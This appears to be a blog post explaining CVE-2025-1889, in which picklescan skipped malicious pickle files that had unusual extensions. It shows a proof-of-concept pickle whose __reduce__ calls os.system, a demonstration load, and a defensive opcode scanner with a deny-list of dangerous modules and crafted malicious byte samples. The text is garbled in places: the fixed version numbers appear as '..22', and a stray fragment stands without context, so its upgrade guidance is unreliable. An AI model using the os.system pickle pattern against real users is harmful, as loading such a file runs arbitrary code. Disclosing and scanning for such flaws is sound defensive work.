A recent vulnerability, CVE-2025-1889, has exposed a serious gap in the security of picklescan versions before ..22. If you’re managing Python models, machine learning pipelines, or sharing serialized objects in your team, this affects you. In simple terms: picklescan missed dangerous files just because they had “weird” file extensions.

This post walks you through how this happened, actual exploit details, and why proper file extension checks alone aren’t enough to stay safe.

What Is Picklescan?

picklescan is an open source scanner that reviews Python model files for unsafe pickle usage. Pickle is a Python module that serializes and deserializes Python objects—but pickle can also run arbitrary code, making it a known attack vector if untrusted files are loaded.

picklescan aims to help developers and data scientists by scanning for malicious pickles in their projects.

maybe .pt for PyTorch

But what if someone put a dangerous pickle file in your project with a non-standard extension, like .data or .img?

Attack Scenario

1. Attacker creates a malicious pickle file that would, for example, start a reverse shell or install malware if loaded.

Here’s how an attacker might create a malicious pickle:

# evil_pickle.py
import pickle
import os

class Exploit:
    def __reduce__(self):
        # This command runs as soon as this pickle is loaded
        return (os.system, ('echo HACKED > /tmp/pickled',))

evil = Exploit()

with open("malicious.data", "wb") as f:
    pickle.dump(evil, f)

*This creates a file called malicious.data that, when loaded, will write HACKED into /tmp/pickled.*

Now compare what happens with picklescan:

picklescan scan ./malicious.data
# Output: No issues detected! (before v..22)

But if you load it in Python:

import pickle
pickle.load(open("malicious.data", "rb"))
# HACKED is written to /tmp/pickled!

How To Fix It

Starting with picklescan ..22, the tool scans all files—regardless of extension—for pickle signatures. If you’re still using an older version, update now!
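The kind of content-based check that closes this gap, as an added illustration rather than picklescan's own code: it sniffs the pickle opcode stream with pickletools (never pickle.load) regardless of file name and reports any GLOBAL/STACK_GLOBAL that resolves into a deny-listed module. The deny-list and the sample blobs are constructed for this example.

```python
import pickle
import pickletools

# Constructed deny-list for this example (picklescan keeps its own list):
# modules whose callables a REDUCE in a model file should never reference.
UNSAFE_MODULES = {"os", "posix", "nt", "subprocess", "builtins", "sys",
                  "socket", "shutil", "runpy", "pty", "importlib"}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}

def referenced_globals(data: bytes) -> list:
    """Walk the opcode stream and collect every (module, name) a GLOBAL,
    INST or STACK_GLOBAL opcode resolves. Returns [] if the bytes do not
    parse as a pickle. Nothing is ever unpickled."""
    found, strings = [], []
    try:
        for op, arg, _pos in pickletools.genops(data):
            if op.name in STRING_OPS:          # operands for STACK_GLOBAL
                strings.append(arg)
            elif op.name in ("GLOBAL", "INST"):  # arg is "module name"
                found.append(tuple(arg.split(" ", 1)))
            elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
    except Exception:  # truncated stream or not a pickle at all
        return []
    return found

def is_pickle(data: bytes) -> bool:
    """Content sniff: a parseable opcode stream that reaches STOP."""
    try:
        return any(op.name == "STOP" for op, _a, _p in pickletools.genops(data))
    except Exception:
        return False

def scan_bytes(data: bytes) -> dict:
    """Extension-agnostic verdict for one blob."""
    unsafe = [g for g in referenced_globals(data) if g[0] in UNSAFE_MODULES]
    return {"is_pickle": is_pickle(data), "unsafe": unsafe}

# Constructed samples, not files from the post above.
PROTO0_EVIL = b"cos\nsystem\n(S'echo HACKED'\ntR."       # GLOBAL + REDUCE
PROTO4_EVIL = (b"\x80\x04\x8c\x02os\x8c\x06system\x93"     # STACK_GLOBAL
               b"\x8c\x0becho HACKED\x85R.")
BENIGN = pickle.dumps({"weights": [0.1, 0.2]})
NOT_PICKLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    for name, blob in [("malicious.data", PROTO0_EVIL), ("model.img", PROTO4_EVIL),
                       ("clean.bin", BENIGN), ("logo.png", NOT_PICKLE)]:
        print(name, scan_bytes(blob))
```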

Upgrade using:

pip install --upgrade picklescan

Tip: Even with extension checks, always validate and restrict what files are loaded, especially those from public or untrusted sources.


- Update picklescan to >=..22 to make sure hidden malicious pickles can’t sneak by.

- Inspect your workflows for any use of pickle, and consider adopting safer serialization (like JSON) when possible.

CVE-2025-1889 is a good reminder: attackers are clever. Tools need to keep up. So do we!


*Stay safe out there. If you have a custom scan pipeline, make sure it’s not fooled by file extensions—or you might get pickled next time.*

Timeline

Published on: 03/03/2025 19:15:34 UTC
Last modified on: 03/05/2025 20:49:16 UTC